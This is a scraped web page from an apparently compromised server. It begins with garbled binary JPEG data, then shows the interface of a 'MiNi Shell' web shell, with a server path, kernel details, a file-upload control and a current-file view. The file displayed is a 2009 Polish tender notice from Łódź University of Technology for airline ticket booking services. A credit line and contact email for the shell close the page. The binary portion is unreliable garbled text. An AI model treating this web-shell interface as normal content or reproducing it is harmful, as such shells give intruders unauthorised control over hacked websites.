JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090212/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090212/37067-N-2009.html

<p class="kh_header"><b>Łódź: Świadczenie usług w zakresie rezerwacji i sprzedaży biletów lotniczych dla Politechniki Łódzkiej - Dział Współpracy z Zagranicą</b><br>
<b>Numer ogłoszenia: 37067 - 2009; data zamieszczenia: 12.02.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Politechnika Łódzka - Dział Współpracy z Zagranicą , ul. Skorupki 6/8, 90-924 Łódź, woj. łódzkie, tel. 0-42 6312081, faks 0-42 6365014.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zp.p.lodz.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b>  Uczelnia publiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usług w zakresie rezerwacji i sprzedaży biletów lotniczych dla Politechniki Łódzkiej - Dział Współpracy z Zagranicą.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest Świadczenie usług w zakresie rezerwacji i sprzedaży biletów lotniczych dla Politechniki Łódzkiej - Dział Współpracy z Zagranicą w terminie od dnia zawarcia umowy do 30 września  2009r.
2 Zakres przedmiotu zamówienia obejmuje:
2.1. Kompleksową obsługę w zakresie rezerwacji biletów lotniczych międzynarodowych oraz bezkolizyjną realizację połączeń wieloetapowych zagranicznych,
2.2. Realizowanie usług przez Wykonawcę, po zawiadomieniu przez Zamawiającego telefonicznie, e-mailem, komunikatorem gadu-gadu lub faxem z możliwie długim wyprzedzeniem, nie krótszym jednak niż 10 dni o zamówieniu danego biletu lotniczego,
2.3 Możliwość realizowania usług przez Wykonawcę w nagłych przypadkach, wówczas termin zawiadomienia Wykonawcy nie może być krótszy niż 12 godzin od terminu wylotu.
2.4. Zorganizowanie i zabezpieczenie kompleksowej realizacji przedmiotu zamówienia zgodnie z obowiązującymi przepisami lokalnymi i krajów docelowych (dot. wszelkiego rodzaju opłat np. lotniskowych, podatków, itp.).
2.5. Dokonywanie optymalnego wyboru przewoźnika oraz trasy przelotu pod względem ceny i czasu trwania podróży. Najdłuższy czas oczekiwania na lotnisku w przelocie pośrednim nie może wynosić dłużej niż 4 godziny.
2.6. Zastosowanie najtańszych taryf przewoźnika: zamawiane bilety mają być najtańszymi dostępnymi biletami lotniczymi według taryf IATA, taryf specjalnych, taryf poufnych i promocyjnych, chyba, że Zamawiający zgłosi w tym zakresie inne wymogi.
2.7. Przedstawianie Zamawiającemu wariantów połączeń związanych z jedną podróżą - o ile jest to możliwe ze względów techniczno-organizacyjnych co najmniej trzech, łącznie z cenami poszczególnych wariantów.
2.8. Wystawianie biletów (drukowanie) przez Wykonawcę, po akceptacji dokonanej w formie elektronicznej lub telefonicznie, przez upoważnionego przedstawiciela Zamawiającego z Działu Współpracy z Zagranicą. 
2.9. Rezerwację, sprzedaż oraz przekazywanie biletów lotniczych do siedziby Zamawiającego lub pod wskazany adres (do 30 km od siedziby Zamawiającego w przypadku braku możliwości przesłania mailem) w ciągu maksymalnie 6 godzin od wystawienia biletu.
2.10. Możliwość dokonania zmiany-przepisania nazwiska pracownika Zamawiającego na bilecie oraz ewentualnej rezygnacji z zaplanowanego przelotu zgodnie z zasadami określonymi w regulaminie przewoźnika, którego to dotyczy. Zmiana taka będzie realizowana z pominięciem opłaty transakcyjnej.
2.11. Kontrolowanie spełniania warunków przewoźnika (w zakresie np. terminów dokonywania wykupu biletów).
2.12. Zapewnienie możliwości odbioru biletu poza granicami RP.
2.13. Zamawiający dokona zapłaty Wykonawcy należności w kwocie skalkulowanej na podstawie najtańszych taryf IATA, taryf specjalnych, poufnych lub promocyjnych w dniu wystawienia biletu, za wykonanie usług określonych w pkt. 2.1. SIWZ na podstawie otrzymanej faktury VAT, odpowiednio do terminu wskazanego przez Wykonawcę wyłonionego w niniejszym postępowaniu.
2.14. Możliwość zwrotu biletów niewykorzystanych zgodnie z regulaminem i taryfami przewoźnika, tj. w przypadku zwrotu 100% kosztów biletu przez  przewoźnika, zwrot  100% kosztów Zamawiającemu. Wykonawca jest zobowiązany w przypadku zwrotu biletu okazać Zamawiającemu dokument informujący o sposobie rozliczenia niewykorzystanego biletu przez przewoźnika.
2.15. Umieszczanie na fakturze następujących informacji: części składowe ceny biletu, dane pasażera oraz dane dotyczące podróży.

3. Przedmiot zamówienia będzie realizowany na podstawie postanowień określonych w Załączniku nr 1a do SIWZ - Szczegółowe warunki realizacji przedmiotu zamówienia i w Załączniku nr 1b do SIWZ - Arkusz kalkulacyjny określający cenę jednostkową oferty, tj. na podstawie postanowień wskazanych przez Wykonawcę wyłonionego w niniejszym postępowaniu. 63.51.20.00-1.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 63.51.20.00-1.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Każdy Wykonawca przystępujący do niniejszego postępowania jest zobowiązany do wniesienia wadium w wysokości 20000.00 PLN (dwadzieścia tysięcy PLN).<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. Zamawiający dokona zgodnie z art. 22 ust. 1 ustawy Pzp wyboru spośród Wykonawców, którzy:
1.1. posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień,
1.2 posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia,
1.3. znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia, 
1.4 nie podlegają wykluczeniu z postępowania o udzielenie zamówienia, zgodnie z art. 24 ust. 1 i 2 ustawy Pzp.

1.A Zamawiający dokona wyboru spośród Wykonawców, którzy potwierdzą, że oferowane usługi odpowiadają wymaganiom określonym przez Zamawiającego.

2 Sposób dokonania oceny spełnienia warunków. 

Ocena spełnienia wymaganych warunków zostanie dokonana metodą spełnia-nie spełnia  w oparciu o dokumenty wyszczególnione w pkt. 2.1., 2.2., 2.3. i 2.4. 

2.1 Spełnienie warunku wymienionego w pkt. 1.1. i 1.4. zostanie uznane, jeżeli Wykonawca przedstawi:
- Podpisane Oświadczenie Wykonawcy o nie podleganiu wykluczeniu z postępowania, na podstawie art. 24 ust. 1 i 2 ustawy Pzp. (Zał. nr 2b do SIWZ),
 - Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert (Zał. nr 3 do SIWZ),
 - Aktualne zaświadczenie właściwego naczelnika Urzędu Skarbowego (Zał. nr 4 do SIWZ) oraz aktualne zaświadczenie właściwego oddziału ZUS lub KRUS (Zał. nr 5 do SIWZ) potwierdzających odpowiednio, że Wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawionych nie wcześniej niż 3 miesiące przed upływem terminu składania ofert (Zał. 4 i 5 do SIWZ),
- Aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w
art. 24 ust. 1 pkt 4) - pkt 8) ustawy Pzp, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert (Zał. nr 6 do SIWZ),   

2.2. Spełnienie warunku wymienionego w pkt. 1.2. zostanie uznane, jeżeli Wykonawca przedłoży:
- Podpisane Oświadczenie Wykonawcy o spełnieniu warunków (Zał. nr 2a do SIWZ),
- Wykaz wykonanych usług w okresie ostatnich trzech lat, przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeśli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością usługom stanowiącym przedmiot zamówienia, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców i potwierdzeniem, że usługi te zostały wykonane należycie (Zał. nr 7 do SIWZ). 
Wykonawcy są zobowiązani udokumentować wykonanie usług w ciągu ostatnich 3 lat
 (od 1.02.2006r. do 31.01.2009r.), tj. jednej usługi dot. Rezerwacji i sprzedaży biletów lotniczych o wartości min. 600000.00 PLN (sześćset  tysięcy) brutto lub min. trzech usług, gdzie wartość każdej usługi wynosi min. 200000.00 PLN (dwieście tysięcy PLN) brutto.
- Wykaz osób, którymi dysponuje lub będzie dysponował Wykonawca i które będą uczestniczyć w wykonywaniu zamówienia wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia (Zał. nr 8 do SIWZ). Zamawiający oczekuje, aby Wykonawca w Wykazie wskazał, co najmniej jedną kasjerkę lotniczą, która posiada ukończony co najmniej jeden kurs taryfowy IATA oraz Zamawiający oczekuje, aby Wykonawca w Wykazie wskazał, że min. trzy kasjerki, posiadają ukończony co najmniej jeden kurs rezerwacyjny. 
Ponadto Zamawiający oczekuje, aby co najmniej jedna kasjerka posiadała co najmniej trzyletni staż pracy na stanowisku kasjerki lotniczej, a dwie kasjerki posiadały co najmniej roczny staż pracy na stanowisku kasjerki lotniczej 
lub  
- Pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, jeśli w Wykazie stanowiącym Załącznik nr 8 do SIWZ, Wykonawca wskazał osoby, którymi będzie dysponował. 

2.3. Spełnienie warunku wymienionego w pkt. 1.3 zostanie uznane, jeżeli Wykonawca przedłoży:
- Polisę, a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej na kwotę nie mniejszą niż 180000.00 PLN (Zał. nr 9 do SIWZ).

2.4. Spełnienie warunku wymienionego w pkt. 1.A zostanie uznane, jeżeli Wykonawca przedłoży:
  - Certyfikat członkowstwa Międzynarodowego Stowarzyszenia Transportu Lotniczego IATA (Zał. nr 10 do SIWZ)..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> - Oświadczenie Wykonawcy spełniającego warunki o udzielenie zamówienia na podstawie art. 22 ust. 1 ustawy Pzp,
- Oświadczenie Wykonawcy o nie podleganiu wykluczeniu z postępowania na podstawie art. 24 ust. 1 i 2 ustawy Pzp, 
- Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert, 
- Aktualne zaświadczenie właściwego naczelnika Urzędu Skarbowego oraz właściwego oddziału ZUS lub KRUS, potwierdzających odpowiednio, że Wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawionych nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
- Aktualna informacja z Krajowego Rejestru Karnego w zakresie określonym w
art. 24 ust. 1 pkt 4) - pkt 8) ustawy Pzp, wystawiona nie wcześniej niż 6 miesięcy przed upływem terminu składania. 
- Wykaz wykonanych usług w okresie ostatnich trzech lat, przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeśli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością usługom stanowiącym przedmiot zamówienia, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców i potwierdzeniem, że usługi te zostały wykonane należycie Wykonawcy są zobowiązani udokumentować wykonanie usług w ciągu ostatnich 3 lat (od 1.02.2006r. do 31.01.2009r.) tj. jednej usługi dot. Rezerwacji i sprzedaży biletów lotniczych o wartości min. 600000.00 PLN (sześćset tysięcy) brutto lub min. trzech usług, gdzie wartość każdej usługi wynosi min. 200000.00 PLN (dwieście tysięcy PLN) brutto.
- Wykaz osób, którymi dysponuje lub będzie dysponował Wykonawca i które będą uczestniczyć w wykonywaniu zamówienia wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności. Zamawiający oczekuje, aby Wykonawca w Wykazie wskazał, co najmniej jedną kasjerkę lotniczą, która posiada ukończony co najmniej jeden kurs taryfowy IATA oraz Zamawiający oczekuje, aby Wykonawca w Wykazie wskazał, że min. trzy kasjerki, posiadają ukończony co najmniej jeden kurs rezerwacyjny. 
Zamawiający oczekuje, aby co najmniej jedna kasjerka posiadała co najmniej trzyletni staż pracy na stanowisku kasjerki lotniczej, a dwie kasjerki posiadały co najmniej roczny staż pracy na stanowisku kasjerki lotniczej.
lub
Wykonawca przedłoży Pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, jeśli w Wykazie stanowiącym Załącznik nr 8 do SIWZ, Wykonawca wskazał osoby, którymi będzie dysponował. 
- Polisa, a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej na kwotę nie mniejszą niż 180000.00 PLN.
- Certyfikat członkostwa Międzynarodowego Stowarzyszenia Transportu Lotniczego IATA.
Wszystkie ww. dokumenty powinny być przedstawione w formie oryginału lub kserokopii poświadczonej za zgodność z oryginałem, przez osobę uprawnioną do składania oświadczeń woli w imieniu Wykonawcy..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1"><br>
<li>1 - Cena - 65</li>
<li>2 - Proponowane przez wykonawcę usługi dodatkowe - 30</li>
<li>3 - Termin płatności - 5</li>
</ul><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.zp.p.lodz.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> POLITECHNIKA ŁÓDZKA -
DZIAŁ WSPÓŁPRACY
Z ZAGRANICĄ
90-924 Łódź, ul. Ks. Skorupki 6/8,
w godz. pracy Zamawiającego od- 7:30 do 15:30
- odpłatnie.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.02.2009 godzina 14:00, miejsce: Oferty należy składać w sekretariacie Prorektora ds. Nauki Politechniki Łódzkiej (pokój 109), Łódź, ul. Ks. I. Skorupki 6/8.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com